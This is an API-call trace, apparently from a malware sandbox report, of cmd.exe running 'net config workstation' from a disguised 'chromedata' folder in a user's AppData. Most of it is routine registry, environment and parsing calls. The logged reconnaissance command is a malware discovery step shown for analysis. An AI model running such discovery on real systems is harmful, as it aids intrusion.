	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0xe8, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x1, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0x1, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x0, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x40, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x40, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0x40, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegCloseKey (hKey=0x40) returned 0x0
	[0228.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec9c | out: phkResult=0x1aec9c*=0x40) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0x40, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x1, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0x1, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x0, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x9, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x4, lpData=0x1aeca8*=0x9, lpcbData=0x1aeca0*=0x4) returned 0x0
	[0228.612] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeca4, lpData=0x1aeca8, lpcbData=0x1aeca0*=0x1000 | out: lpType=0x1aeca4*=0x0, lpData=0x1aeca8*=0x9, lpcbData=0x1aeca0*=0x1000) returned 0x2
	[0228.612] RegCloseKey (hKey=0x40) returned 0x0
	[0228.612] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadfe2
	[0228.612] srand (_Seed=0x5cdadfe2) 
	[0228.612] GetCommandLineW () returned="/c net config workstation"
	[0228.612] GetCommandLineW () returned="/c net config workstation"
	[0228.613] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3e5260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0228.613] GetProcessHeap () returned 0x2d0000
	[0228.613] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e1ce8
	[0228.613] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0228.613] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0228.613] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0228.613] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0228.613] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0228.613] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0228.613] GetProcessHeap () returned 0x2d0000
	[0228.613] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e0ad8 | out: hHeap=0x2d0000) returned 1
	[0228.613] GetEnvironmentStringsW () returned 0x2e01d0*
	[0228.613] GetProcessHeap () returned 0x2d0000
	[0228.613] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x912) returned 0x2e2820
	[0228.614] FreeEnvironmentStringsW (penv=0x2e01d0) returned 1
	[0228.614] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0228.614] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0228.614] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0228.614] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0228.614] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0228.614] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0228.614] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0228.614] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0228.614] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0228.614] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0228.614] GetProcessHeap () returned 0x2d0000
	[0228.614] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x6a) returned 0x2d07f0
	[0228.614] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afa68 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0228.614] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x1afa68, lpFilePart=0x1afa64 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x1afa64*="chromedata") returned 0x30
	[0228.614] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0228.614] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af7e4 | out: lpFindFileData=0x1af7e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2e0060
	[0228.614] FindClose (in: hFindFile=0x2e0060 | out: hFindFile=0x2e0060) returned 1
	[0228.614] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x1af7e4 | out: lpFindFileData=0x1af7e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x2e0060
	[0228.615] FindClose (in: hFindFile=0x2e0060 | out: hFindFile=0x2e0060) returned 1
	[0228.615] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0228.615] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x1af7e4 | out: lpFindFileData=0x1af7e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x2e0060
	[0228.615] FindClose (in: hFindFile=0x2e0060 | out: hFindFile=0x2e0060) returned 1
	[0228.615] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x1af7e4 | out: lpFindFileData=0x1af7e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x2e0060
	[0228.615] FindClose (in: hFindFile=0x2e0060 | out: hFindFile=0x2e0060) returned 1
	[0228.615] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x1af7e4 | out: lpFindFileData=0x1af7e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x26d76880, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x26d76880, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x2e0060
	[0228.615] FindClose (in: hFindFile=0x2e0060 | out: hFindFile=0x2e0060) returned 1
	[0228.615] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0228.615] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0228.615] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0228.615] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0228.615] GetProcessHeap () returned 0x2d0000
	[0228.615] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2820 | out: hHeap=0x2d0000) returned 1
	[0228.615] GetEnvironmentStringsW () returned 0x2e01d0*
	[0228.616] GetProcessHeap () returned 0x2d0000
	[0228.616] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x97c) returned 0x2e1f00
	[0228.616] FreeEnvironmentStringsW (penv=0x2e01d0) returned 1
	[0228.616] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3e5260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0228.616] GetProcessHeap () returned 0x2d0000
	[0228.616] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2d07f0 | out: hHeap=0x2d0000) returned 1
	[0228.616] GetProcessHeap () returned 0x2d0000
	[0228.616] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400e) returned 0x2e3ac8
	[0228.616] GetProcessHeap () returned 0x2d0000
	[0228.616] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3a) returned 0x2e2888
	[0228.616] GetProcessHeap () returned 0x2d0000
	[0228.616] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e3ac8 | out: hHeap=0x2d0000) returned 1
	[0228.616] GetConsoleOutputCP () returned 0x1b5
	[0228.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3e4260 | out: lpCPInfo=0x4a3e4260) returned 1
	[0228.616] GetUserDefaultLCID () returned 0x409
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e4950, cchData=8 | out: lpLCData=":") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afba8, cchData=128 | out: lpLCData="0") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afba8, cchData=128 | out: lpLCData="0") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afba8, cchData=128 | out: lpLCData="1") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3e4940, cchData=8 | out: lpLCData="/") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3e4d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3e4d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3e4d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3e4cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3e4c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3e4c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3e4c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e4930, cchData=8 | out: lpLCData=".") returned 2
	[0228.617] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3e4920, cchData=8 | out: lpLCData=",") returned 2
	[0228.617] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0228.618] GetProcessHeap () returned 0x2d0000
	[0228.618] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e28d0
	[0228.618] GetConsoleTitleW (in: lpConsoleTitle=0x2e28d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0228.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0228.619] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0228.619] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0228.619] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0228.619] GetProcessHeap () returned 0x2d0000
	[0228.619] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400a) returned 0x2e3ac8
	[0228.619] GetProcessHeap () returned 0x2d0000
	[0228.619] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e3ac8 | out: hHeap=0x2d0000) returned 1
	[0228.619] _wcsicmp (_String1="net", _String2=")") returned 69
	[0228.619] _wcsicmp (_String1="FOR", _String2="net") returned -8
	[0228.619] _wcsicmp (_String1="FOR/?", _String2="net") returned -8
	[0228.619] _wcsicmp (_String1="IF", _String2="net") returned -5
	[0228.619] _wcsicmp (_String1="IF/?", _String2="net") returned -5
	[0228.619] _wcsicmp (_String1="REM", _String2="net") returned 4
	[0228.619] _wcsicmp (_String1="REM/?", _String2="net") returned 4
	[0228.619] GetProcessHeap () returned 0x2d0000
	[0228.619] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e2ae8
	[0228.619] GetProcessHeap () returned 0x2d0000
	[0228.620] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x10) returned 0x2dd558
	[0228.620] GetProcessHeap () returned 0x2d0000
	[0228.620] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2e2b48
	[0228.620] GetConsoleTitleW (in: lpConsoleTitle=0x1af8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0228.621] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0228.621] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0228.621] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0228.621] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0228.621] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0228.621] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0228.621] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0228.621] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0228.621] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0228.621] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0228.621] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0228.621] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0228.621] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0228.621] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0228.621] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0228.621] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0228.621] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0228.621] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0228.621] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0228.621] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0228.621] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0228.621] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0228.621] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0228.621] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0228.621] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0228.621] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0228.621] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0228.621] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0228.621] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0228.621] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0228.621] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0228.621] _wcsicmp (_String1="net", _String2="START") returned -5
	[0228.621] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0228.621] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0228.621] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0228.621] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0228.621] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0228.621] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0228.621] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0228.622] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0228.622] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0228.622] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0228.622] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0228.622] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0228.622] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0228.622] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0228.622] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0228.622] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0228.622] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0228.622] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0228.622] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0228.622] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0228.622] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0228.622] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0228.622] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0228.622] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0228.622] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0228.622] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0228.622] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0228.622] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0228.622] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0228.622] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0228.622] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0228.622] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0228.622] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0228.622] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0228.622] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0228.622] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0228.622] _wcsicmp (_String1="net", _String2="START") returned -5
	[0228.622] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0228.622] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0228.622] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0228.622] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0228.622] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0228.622] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0228.623] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0228.623] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0228.623] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0228.623] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0228.623] _wcsicmp (_String1="net", _String2="FOR") returned 8
	[0228.623] _wcsicmp (_String1="net", _String2="IF") returned 5
	[0228.623] _wcsicmp (_String1="net", _String2="REM") returned -4
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e2b80
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2e2d98
	[0228.623] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x418) returned 0x2d07f0
	[0228.623] SetErrorMode (uMode=0x0) returned 0x8001
	[0228.623] SetErrorMode (uMode=0x1) returned 0x0
	[0228.623] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d07f8, lpFilePart=0x1af3c0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x1af3c0*="chromedata") returned 0x30
	[0228.623] SetErrorMode (uMode=0x8001) returned 0x1
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d07f0, Size=0x72) returned 0x2d07f0
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d07f0) returned 0x72
	[0228.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0228.623] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x17e) returned 0x2e2dd8
	[0228.623] GetProcessHeap () returned 0x2d0000
	[0228.623] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2f4) returned 0x2d0870
	[0228.629] GetProcessHeap () returned 0x2d0000
	[0228.629] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d0870, Size=0x180) returned 0x2d0870
	[0228.629] GetProcessHeap () returned 0x2d0000
	[0228.629] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d0870) returned 0x180
	[0228.629] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0228.629] GetProcessHeap () returned 0x2d0000
	[0228.629] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe0) returned 0x2e2f60
	[0228.629] GetProcessHeap () returned 0x2d0000
	[0228.629] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e2f60, Size=0x76) returned 0x2e2f60
	[0228.629] GetProcessHeap () returned 0x2d0000
	[0228.629] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e2f60) returned 0x76
	[0228.630] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
